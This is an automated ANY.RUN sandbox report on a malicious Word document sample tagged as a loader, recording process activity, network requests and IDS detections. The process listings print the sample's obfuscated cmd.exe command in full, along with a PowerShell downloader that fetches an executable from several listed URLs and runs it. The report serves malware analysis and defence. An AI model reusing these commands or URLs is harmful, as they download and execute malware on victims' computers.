File name:

d5fc1eb082ec0c518752186733cfe2c6cb30d08c63a0487d8a4e2bd3dde90688.bin.gz

Full analysis: https://app.any.run/tasks/3a651183-14b6-453e-974f-c0151207e54c
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Malware Trends Tracker     >>>
Analysis date: January 22, 2019, 12:42:46
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
ransomware
loader
Indicators:
MIME: application/gzip
File info: gzip compressed data, max compression, from Unix
MD5:

B30AC590E6B44F1EF992A14FA9F4D9DC

SHA1:

2478FB3728748B258E92E54175776645ECF0F0FD

SHA256:

23893696A0E7679BA10231EAEEC891D9EF34EBBE7F9CDD8D63022812D15F981A

SSDEEP:

3072:nUMYl6RJBW/IMrLOtOldHfJ7kiNFzProOlN8k:UX8nySmHBDNFzProoKk

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 2664)

    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 2664)

    • Executes PowerShell scripts

      • cmd.exe (PID: 3500)

    • Runs app for hidden code execution

      • cmd.exe (PID: 2864)

    • Request from PowerShell which ran from CMD.EXE

      • powershell.exe (PID: 3756)

    • Application was dropped or rewritten from another process

      • 251.exe (PID: 1860)
      • 251.exe (PID: 3556)

    • Downloads executable files from the Internet

      • powershell.exe (PID: 3756)

  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 2388)
      • cmd.exe (PID: 2864)
      • cmd.exe (PID: 2928)

    • Application launched itself

      • cmd.exe (PID: 2928)
      • 251.exe (PID: 3556)

    • Creates files in the user directory

      • powershell.exe (PID: 3756)

    • Executable content was dropped or overwritten

      • powershell.exe (PID: 3756)

  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2664)

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2664)

    • Dropped object may contain Bitcoin addresses

      • powershell.exe (PID: 3756)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.z/gz/gzip | GZipped data (100)

EXIF

ZIP

Compression: Deflated
Flags: (none)
ModifyDate: 0000:00:00 00:00:00
ExtraFlags: Maximum Compression
OperatingSystem: Unix
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
44
Monitored processes
11
Malicious processes
5
Suspicious processes
1

Behavior graph

Click at the process to see the details
start drop and start winrar.exe no specs winword.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs cmd.exe no specs powershell.exe 251.exe no specs 251.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
1860"C:\Users\admin\AppData\Local\Temp\251.exe"C:\Users\admin\AppData\Local\Temp\251.exe251.exe
User:
admin
Company:
Networks Associates Technology, Inc
Integrity Level:
MEDIUM
Exit code:
0
Version:
8, 0, 0, 26
Modules
Images
c:\users\admin\appdata\local\temp\251.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\imm32.dll
2388c:\i8072\a1011\i6001\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:/C"set bFa=evk2pM-fWX T4R,$Dl6I7JV3@89rB0}xEt{U('zQ~b/5jCcwa\:;om%N+AhGy=OgSL_u.iZ1FnPsd)&&for %9 in (4;52;47;54;74;35;28;65;19;45;50;40;43;14;71;54;27;54;64;32;64;64;19;62;55;55;57;5;32;50;40;6;12;14;71;54;58;54;11;32;5;74;50;40;6;23;14;71;54;17;17;10;15;76;12;18;71;25;61;37;27;23;23;18;26;37;51;15;38;43;20;3;3;61;73;0;47;6;52;41;44;0;46;33;10;55;0;33;68;8;0;41;45;17;69;0;73;33;51;15;69;12;25;12;29;61;37;58;33;33;4;50;42;42;47;47;47;68;33;27;48;73;75;17;48;53;4;67;73;63;68;46;52;53;42;64;58;45;58;73;32;28;41;73;45;62;24;58;33;33;4;50;42;42;48;63;0;73;33;7;52;31;68;69;52;42;55;12;62;7;22;32;39;45;12;28;67;35;1;72;45;22;24;58;33;33;4;50;42;42;73;69;63;0;27;69;48;7;48;75;41;53;41;46;52;73;63;27;0;75;75;68;7;67;33;53;69;73;73;48;68;0;76;67;68;73;63;42;23;13;5;3;43;45;20;53;25;58;9;32;20;25;62;66;65;24;58;33;33;4;50;42;42;75;52;75;6;76;0;41;52;67;46;58;48;63;0;6;76;67;53;0;73;60;68;46;52;53;42;47;4;6;48;76;53;69;73;42;22;46;59;21;60;76;13;25;19;72;64;26;24;58;33;33;4;50;42;42;75;48;17;48;58;68;53;52;41;69;69;17;48;33;68;46;52;53;42;32;63;0;29;16;44;7;39;13;62;63;8;17;1;21;70;17;66;73;75;55;1;1;37;68;64;4;17;69;33;36;37;24;37;77;51;15;38;26;12;20;25;61;37;33;23;43;18;20;37;51;15;48;3;3;26;26;10;61;10;37;3;43;71;37;51;15;73;26;3;26;3;61;37;47;71;29;26;26;37;51;15;75;25;25;29;3;61;15;0;73;1;50;33;0;53;4;56;37;49;37;56;15;48;3;3;26;26;56;37;68;0;31;0;37;51;7;52;27;0;48;46;58;36;15;27;12;18;12;18;10;69;73;10;15;69;12;25;12;29;77;34;33;27;60;34;15;38;43;20;3;3;68;16;52;47;73;17;52;48;76;72;69;17;0;36;15;27;12;18;12;18;14;10;15;75;25;25;29;3;77;51;15;69;23;26;26;3;61;37;69;20;29;29;37;51;19;7;10;36;36;59;0;33;6;19;33;0;53;10;15;75;25;25;29;3;77;68;17;0;73;63;33;58;10;6;63;0;10;12;29;29;29;29;77;10;34;19;73;1;52;2;0;6;19;33;0;53;10;15;75;25;25;29;3;51;15;27;26;3;18;25;61;37;1;26;25;12;25;37;51;41;27;0;48;2;51;30;30;46;48;33;46;58;34;30;30;15;69;25;43;29;71;61;37;38;26;20;12;20;37;51;79)do set jtJD=!jtJD!!bFa:~%9,1!&&if %9==79 echo !jtJD:~-629!|FOR /F "tokens=2 delims==Rf" %R IN ('assoc.cmd')DO %R "c:\windows\system32\cmd.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
2664"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\RG_V60G93J.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
Modules
Images
c:\program files\microsoft office\office14\winword.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll
2808C:\Windows\system32\cmd.exe /S /D /c" echo pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll $d4618='r3369';$z5722=new-object Net.WebClient;$i4840='http://www.translampung.com/ShChnEBbnCO@http://agentfox.io/N4OfVEQC4BuUvFCV@http://nigeriafasbmbcongress.futminna.edu.ng/3RM25C7m8hXE78O_L@http://sos-debouchage-dumeny.com/wp-admin/VcGJydR8IFS9@http://salah.mobiilat.com/Ege0DjfQROgWlvJZl_nsNvv'.Split('@');$z9478='t3567';$a2299 = '251';$n9292='w1099';$s8802=$env:temp+'\'+$a2299+'.exe';foreach($r4646 in $i4840){try{$z5722.DownloadFile($r4646, $s8802);$i3992='i700';If ((Get-Item $s8802).length -ge 40000) {Invoke-Item $s8802;$r9268='v9848';break;}}catch{}}$i8501='z9747';"C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
2864C:\Windows\system32\cmd.exe /S /D /c" FOR /F "tokens=2 delims==Rf" %R IN ('assoc.cmd') DO %R "C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
2928CmD /V:/C"set bFa=evk2pM-fWX T4R,$Dl6I7JV3@89rB0}xEt{U('zQ~b/5jCcwa\:;om%N+AhGy=OgSL_u.iZ1FnPsd)&&for %9 in (4;52;47;54;74;35;28;65;19;45;50;40;43;14;71;54;27;54;64;32;64;64;19;62;55;55;57;5;32;50;40;6;12;14;71;54;58;54;11;32;5;74;50;40;6;23;14;71;54;17;17;10;15;76;12;18;71;25;61;37;27;23;23;18;26;37;51;15;38;43;20;3;3;61;73;0;47;6;52;41;44;0;46;33;10;55;0;33;68;8;0;41;45;17;69;0;73;33;51;15;69;12;25;12;29;61;37;58;33;33;4;50;42;42;47;47;47;68;33;27;48;73;75;17;48;53;4;67;73;63;68;46;52;53;42;64;58;45;58;73;32;28;41;73;45;62;24;58;33;33;4;50;42;42;48;63;0;73;33;7;52;31;68;69;52;42;55;12;62;7;22;32;39;45;12;28;67;35;1;72;45;22;24;58;33;33;4;50;42;42;73;69;63;0;27;69;48;7;48;75;41;53;41;46;52;73;63;27;0;75;75;68;7;67;33;53;69;73;73;48;68;0;76;67;68;73;63;42;23;13;5;3;43;45;20;53;25;58;9;32;20;25;62;66;65;24;58;33;33;4;50;42;42;75;52;75;6;76;0;41;52;67;46;58;48;63;0;6;76;67;53;0;73;60;68;46;52;53;42;47;4;6;48;76;53;69;73;42;22;46;59;21;60;76;13;25;19;72;64;26;24;58;33;33;4;50;42;42;75;48;17;48;58;68;53;52;41;69;69;17;48;33;68;46;52;53;42;32;63;0;29;16;44;7;39;13;62;63;8;17;1;21;70;17;66;73;75;55;1;1;37;68;64;4;17;69;33;36;37;24;37;77;51;15;38;26;12;20;25;61;37;33;23;43;18;20;37;51;15;48;3;3;26;26;10;61;10;37;3;43;71;37;51;15;73;26;3;26;3;61;37;47;71;29;26;26;37;51;15;75;25;25;29;3;61;15;0;73;1;50;33;0;53;4;56;37;49;37;56;15;48;3;3;26;26;56;37;68;0;31;0;37;51;7;52;27;0;48;46;58;36;15;27;12;18;12;18;10;69;73;10;15;69;12;25;12;29;77;34;33;27;60;34;15;38;43;20;3;3;68;16;52;47;73;17;52;48;76;72;69;17;0;36;15;27;12;18;12;18;14;10;15;75;25;25;29;3;77;51;15;69;23;26;26;3;61;37;69;20;29;29;37;51;19;7;10;36;36;59;0;33;6;19;33;0;53;10;15;75;25;25;29;3;77;68;17;0;73;63;33;58;10;6;63;0;10;12;29;29;29;29;77;10;34;19;73;1;52;2;0;6;19;33;0;53;10;15;75;25;25;29;3;51;15;27;26;3;18;25;61;37;1;26;25;12;25;37;51;41;27;0;48;2;51;30;30;46;48;33;46;58;34;30;30;15;69;25;43;29;71;61;37;38;26;20;12;20;37;51;79)do set jtJD=!jtJD!!bFa:~%9,1!&&if %9==79 echo !jtJD:~-629!|FOR /F "tokens=2 delims==Rf" %R IN ('assoc.cmd')DO %R "C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
3056"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\Desktop\d5fc1eb082ec0c518752186733cfe2c6cb30d08c63a0487d8a4e2bd3dde90688.bin.gz.z"C:\Program Files\WinRAR\WinRAR.exeexplorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Exit code:
0
Version:
5.60.0
Modules
Images
c:\program files\winrar\winrar.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\comdlg32.dll
3500cmd C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
3556"C:\Users\admin\AppData\Local\Temp\251.exe" C:\Users\admin\AppData\Local\Temp\251.exepowershell.exe
User:
admin
Company:
Networks Associates Technology, Inc
Integrity Level:
MEDIUM
Exit code:
0
Version:
8, 0, 0, 26
Modules
Images
c:\users\admin\appdata\local\temp\251.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\imm32.dll
3756powershell $d4618='r3369';$z5722=new-object Net.WebClient;$i4840='http://www.translampung.com/ShChnEBbnCO@http://agentfox.io/N4OfVEQC4BuUvFCV@http://nigeriafasbmbcongress.futminna.edu.ng/3RM25C7m8hXE78O_L@http://sos-debouchage-dumeny.com/wp-admin/VcGJydR8IFS9@http://salah.mobiilat.com/Ege0DjfQROgWlvJZl_nsNvv'.Split('@');$z9478='t3567';$a2299 = '251';$n9292='w1099';$s8802=$env:temp+'\'+$a2299+'.exe';foreach($r4646 in $i4840){try{$z5722.DownloadFile($r4646, $s8802);$i3992='i700';If ((Get-Item $s8802).length -ge 40000) {Invoke-Item $s8802;$r9268='v9848';break;}}catch{}}$i8501='z9747';C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
Total events
1 898
Read events
1 417
Write events
474
Delete events
7

Modification events

(PID) Process:(3056) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes
Operation:writeName:ShellExtBMP
Value:
(PID) Process:(3056) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes
Operation:writeName:ShellExtIcon
Value:
(PID) Process:(3056) WinRAR.exeKey:HKEY_CLASSES_ROOT\Local Settings\MuiCache\5F\52C64B7E
Operation:writeName:LanguageList
Value:
en-US
(PID) Process:(3056) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\ArcHistory
Operation:writeName:0
Value:
C:\Users\admin\Desktop\d5fc1eb082ec0c518752186733cfe2c6cb30d08c63a0487d8a4e2bd3dde90688.bin.gz.z
(PID) Process:(3056) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:name
Value:
120
(PID) Process:(3056) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:size
Value:
80
(PID) Process:(3056) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:type
Value:
120
(PID) Process:(3056) WinRAR.exeKey:HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths
Operation:writeName:mtime
Value:
100
(PID) Process:(2664) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:writeName:92+
Value:
39322B00680A0000010000000000000000000000
(PID) Process:(2664) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1033
Value:
Off
Executable files
1
Suspicious files
2
Text files
2
Unknown types
5

Dropped files

PID
Process
Filename
Type
3056WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DRa3056.49274\d5fc1eb082ec0c518752186733cfe2c6cb30d08c63a0487d8a4e2bd3dde90688.bin.gz
MD5:
SHA256:
2664WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR4209.tmp.cvr
MD5:
SHA256:
2664WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8F8887EC.jpg
MD5:
SHA256:
3756powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\GIJRR2WLUIJN3X5X83L9.temp
MD5:
SHA256:
2664WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:
SHA256:
2664WINWORD.EXEC:\Users\admin\Desktop\~$_V60G93J.docpgc
MD5:
SHA256:
2664WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dattext
MD5:
SHA256:
2664WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\RG_V60G93J.doc.LNKlnk
MD5:
SHA256:
3756powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF2156ca.TMPbinary
MD5:
SHA256:
2664WINWORD.EXEC:\Users\admin\AppData\Local\Temp\VBE\MSForms.exdtlb
MD5:
SHA256:
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
1
DNS requests
1
Threats
5

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3756
powershell.exe
GET
301
103.247.10.155:80
http://www.translampung.com/ShChnEBbnCO
ID
html
248 b
malicious
3756
powershell.exe
GET
200
103.247.10.155:80
http://www.translampung.com/ShChnEBbnCO/
ID
executable
348 Kb
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3756
powershell.exe
103.247.10.155:80
www.translampung.com
Rumahweb Indonesia CV.
ID
suspicious

DNS requests

Domain
IP
Reputation
www.translampung.com
  • 103.247.10.155
malicious

Threats

PID
Process
Class
Message
3756
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Suspicious loader with tiny header
3756
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32
3756
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
3756
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
3756
powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2026 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
d5fc1eb082ec0c518752186733cfe2c6cb30d08c63a0487d8a4e2bd3dde90688.bin.gz